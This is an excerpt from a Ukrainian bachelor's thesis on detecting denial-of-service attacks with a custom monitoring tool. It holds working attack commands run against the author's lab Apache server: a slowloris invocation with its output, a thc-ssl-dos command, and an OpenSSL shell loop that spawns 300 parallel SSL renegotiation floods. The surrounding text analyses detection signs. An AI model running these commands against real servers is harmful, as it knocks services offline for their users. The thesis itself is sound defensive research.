Предмет:
Тип роботи:
Бакалаврська робота
К-сть сторінок:
57
Мова:
Українська
VRAM: 3436118016/12316618752 CPU: 100. 0
Sun Jun 12 17: 15: 39 2016
IPv4: 437 IPv6: 0 ARP: 0 Other: 27 TCP: 391 UDP: 17 ICMP: 29 Other: 0 SYN: 246 SYN+ACK: 4 ACK: 141 RST: 0 RX: 14757058 TX: 582934 RAM: 3415924736/3726688256 VRAM: 3416014848/12316618752 CPU: 100. 0
Sun Jun 12 17: 15: 40 2016
IPv4: 479 IPv6: 0 ARP: 0 Other: 27 TCP: 433 UDP: 17 ICMP: 29 Other: 0 SYN: 288 SYN+ACK: 4 ACK: 141 RST: 0 RX: 15686338 TX: 602412 RAM: 3508961280/3726688256 VRAM: 3509051392/12316618752 CPU: 100. 0
Можна побачити стрімке зростання кількості пакетів та збільшення співвідношення кількості SYN пакетів до кількості SYN+ACK-пакетів, що є ознакою наявності SYN Flood-атаки, відповідно до попередньо наведених розрахунків.
Рисунок 3. 6 – Графіки залежності кількості пакетів та об'єму трафіку від часу
В результаті проведення атаки локальна мережа на час атаки була повністю заблокована, включаючи маршрутизатор. Розроблений програмний засіб демонстрував різке зростання кількості TCP SYN-пакетів та невідповідність між кількістю SYN та SYN+ACK-пакетів.
3.3.2. Slowloris
Атака проводилась на веб-сервер Apache за допомогою програмного засобу slowloris. pl. Slowloris – програмне забезпечення, написаним Робертом «RSnake» Хансеном, дозволяє вивести веб-сервер з ладу за допомогою вразливості в реалізації навіть з однієї машини з непотужним Інтернет-каналом. Slowloris намагається встановити багато підключень з веб-сервером та тримати їх відкритими як-найдовше.
Вразливими до атаки веб-серверами на даний час є Apache та dhttpd.
Для роботи програми необхідно встановити інтерпретатор мови програмування perl.
Було використанонаступну команду:
slowloris -dns 192. 168. 12. 157
що означає виконання атаки без додаткових параметрів з опціональним отриманням IP-адреси, якщо замість неї вказано доменне ім'я.
Defaulting to port 80.
Defaulting to a 5 second tcp connection timeout.
Defaulting to a 100 second re-try timeout.
Defaulting to 1000 connections.
Multithreading enabled.
Connecting to 192. 168. 12. 157: 80 every 100 seconds with 1000 sockets:
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Sending data.
Current stats: Slowloris has now sent 2416 packets successfully.
This thread now sleeping for 100 seconds...
Sending data.
Current stats: Slowloris has now sent 2520 packets successfully.
This thread now sleeping for 100 seconds...
В результаті атаки через деякий час веб-сервер припинив відповідати на запити. Мережа при цьому працювала нормально. У звіті програми є помітні стрибки у кількості TCP пакетів. Результати роботи прогарми представлено на рисунку 3. 7.
Рисунок 3. 7 – графік зростання пакетів при Slowloris-атаці
Отже, атака типу Slowloris є складнішою у розпізнаванні, але може бути виявлена за зростанням кількості TCP-пакетів та припиненні нормальної роботи веб-сервера без створення істотного навантаження. Також після заповнення буфера веб-сервера помітно зростає кількість втрат SYN+ACK-пакетів.
3.3.3. SSL DoS
На комп'ютері з встановленим прогармним засобом було налаштовано веб-сервер з підтримкою HTTPS, який використовує SSL (Apache).
Для атаки використовувався програмний засіб THC SSL DOS. За замовчуванням програма має обмеження на кількість запитів з метою попередження використання програми зловмисниками.
Рисунок 3. 8 – Графік результатів атаки SSL DoS
Наступна команда дозволяє запустити атаку за замовчуванням на 443 порт (HTTPS). Необхідно додати «--accept» для того, щоб підтвердити, что зазаначена IP-адреса належить користувачу.
thc-ssl-dos 192. 168. 12. 157 443 --accept
Нажаль, така атака не мала ніякого ефекту через те, що Apache не підтримує SSL Renegocitation. Після надсилання декількох пакетів прогарма припинила свою роботу.
Для проведення аналогічної атаки можна використати набір бібліотек OpenSSL наступним чином:
ssldos () { while: ; do (while: ; do echo R; done) | openssl s_client -connect 192. 168. 12. 157: 443; done }
for x in ‘seq 1 300’; do ssldos & done
Мережа працювала нормально, в програмному засобі можна було побачити зростання кількості TCP-пакетів да 100% навантаження центрального процесора. Через деякий час комп'ютер почав працювати істотно повільніше, реагував на дії користувача з помітною затримкою, після чого перестав реагувати на дії користувача. Після припинення атаки довелось почекати ще деякий час, після чого комп'ютер запрацював абсолютно коректно. Збільшення кількості потоків створює також вагоме навантаження на комп'ютер-зловмисника. Атаку можна виявити по ступінчастому зростанню TCP-пакетів, постійному максимальному навантаженню центрального процесора та поступовому зростанню використання оперативної пам'яті (див. рис. 3. 8).
Отже, розроблений програмний засіб дозволяє виявити атаку на відмову в обслуговуванні на ранньому етапі, використовуючи такі параметри, як кількість TCP-пакетів та динаміка їх зростання, завантаження центрального процесора та відмінність між кількістю SYN та SYN+ACK пакетів.
ПЕРЕЛІК ВИКОРИСТАНИХ ДЖЕРЕЛ
- IT-Baseline Protection Manual. – Режим доступу до ресурсу: https: //www. bsi. bund. de/EN/Topics/ITGrundschutz/ITGrundschutzCatalogues/catalogues. html.
- Mirkovic J. A taxonomy of DDoS attack and DDoS defense mechanisms / J J Mirkovic, P Reiher // ACM SIGCOMM Computer Communication. – 2004. – Режим доступу до ресурсу: https: //www. researchgate. net/profile/Peter_Reiher/publication/2879658_A_taxonomy_of_DDoS_attack_and_DDoS_defense_mechanisms/links/02e7e51d1ce0432910000000. pdf.
- Sah JJ. Impact of DDOS attacks on cloud environment / JJ Sah, DLJ Malik // IJRCCT. – 2013. – Режим доступу до ресурсу: http: //ijrcct. org/index. php/ojs/article/download/276/pdf.
- J. Yu. A detection and offense mechanism to defend against application layer DDoS attacks / J. Yu, Z. Li, H. Chen, X. Chen // Networking and Services. – 2007. – Режим доступу до ресурсу: https: //www. researchgate. net/profile/Xiaoming_Chen17/publication/4314603_A_Detection_and_Offense_Mechanism_to_Defend_Against_Application_Layer_DDoS_Attacks/links/546ee4da0cf29806ec2ebfeb. pdf.
- V. Gupta. Denial of service attacks at the MAC layer in wireless ad hoc networks / V. Gupta, S. Krishnamurthy // MILCOM. – 2002. – Режим доступу: https: //www. cs. wmich. edu/wise/doc/spins/dos/denial-of-service-attacks. pdf.
- Z. Chi. Detecting and blocking malicious traffic caused by IRC protocol based botnets / Z. Chi, Z. Zhao // Parallel Computing Workshops. – 2007. – Режим доступу до ресурсу: http: //ieeexplore. ieee. org/xpls/abs_all. jsp? arnumber=4351531.
- M. Srivatsa / Mitigating application-level denial of service attacks on Web servers: A client-transparent approach / M. Srivatsa, A. Iyengar, J. Yin, L. Liu // ACM Transactions on the Web. – 2008. – Режим доступу до ресурсу: http: //researcher. ibm. com/files/us-aruni/TWEBDos. pdf.
- E. Cambiaso / Slow DoS attacks: definition and categorization / E. Cambiaso, G. Papaleo, G. Chiola, M. Aiello // International Journal of Trust Management in Computing and Communications. – 2013. – Режим доступу до ресурсу: http: //www. inderscienceonline. com/doi/abs/10. 1504/IJTMCC. 2013. 056440.
- S. Mansfield-Devine / Anonymous: serious threat or mere annoyance? / S. Mansfield-Devine // Network Security. – 2011. – Режим доступу до ресурсу: http: //www. sciencedirect. com/science/article/pii/S1353485811700046.
- D. Hobbs / Using Spreadsheets as a DDoS weapon / D. Hobbs // Radware Blog – 2012. – Режим доступу до ресурсу: https: //blog. radware. com/security/2012/05/spreadsheets-as-ddos-weapon/.
- P. Ipeirotis / The Google attack: How I attacked myself using Google Spreadsheets and I ramped up a $1000 bandwidth bill / P. Ipeirotis // A Computer Scientist in a Business School – 2012. – Режим доступу: http: //www. behind-the-enemy-lines. com/2012/04/google-attack-how-i-self-attacked. html.
- B Ion / Dc++ and ddos attacks / B Ion, A Furtuna // Journal of Systemics, Cybernetics and Informatics – 2009. – Режим доступу: http: //www. iiis. org/cds2009/cd2009sci/SCI2009/PapersPdf/S167TT. pdf.
- Г. И. Ивченко. Теория массового обслуживания, М: Высшая Школа, 1982.
- WM Eddy / TCP SYN flooding attacks and common mitigations – 2007. – Режим доступу: http: //tools. ietf. org/html/rfc4987/.
- F. Leu / A performance-based grid intrusion detection system / F. Leu, J. Lin, M. Li, C. Yang // Computer Software – 2005. – Режим доступу: http: //ieeexplore. ieee. org/xpls/abs_all. jsp? arnumber=1510079.
- A. Zuquete / Improving the functionality of SYN cookies // Advanced Communications and Multimedia Security – 2002. – Режим доступу: http: //link. springer. com/chapter/10. 1007/978-0-387-35612-9_6.